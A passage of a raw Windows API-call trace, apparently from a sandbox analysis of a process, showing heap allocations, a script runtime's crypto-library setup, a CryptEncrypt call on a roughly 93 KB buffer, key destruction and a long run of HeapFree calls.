out: lpMsg=0x87ee3c) returned 0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0161.149] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.149] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.149] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0161.150] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.150] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.150] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.150] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.150] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.150] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.150] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0161.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.151] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x16c92, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x16ca0) returned 1 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0161.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.152] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.152] CharLowerBuffW (in: lpsz="byte[93345]", cchLength=0xb | out: lpsz="byte[93345]") returned 0xb [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.153] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.154] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.154] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa29770*, pdwDataLen=0x87e820*=0x16c92, dwBufLen=0x16ca0 | out: pbData=0xa29770*, pdwDataLen=0x87e820*=0x16ca0) returned 1 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0161.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.155] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.167] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.167] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.168] CryptDestroyKey (hKey=0x90af18) returned 1 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.168] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.169] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.169] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.170] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0161.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0161.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.216] CloseHandle (hObject=0x138) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.218] CloseHandle (hObject=0x120) returned 1 [0161.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0161.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.233] HeapFree (in: 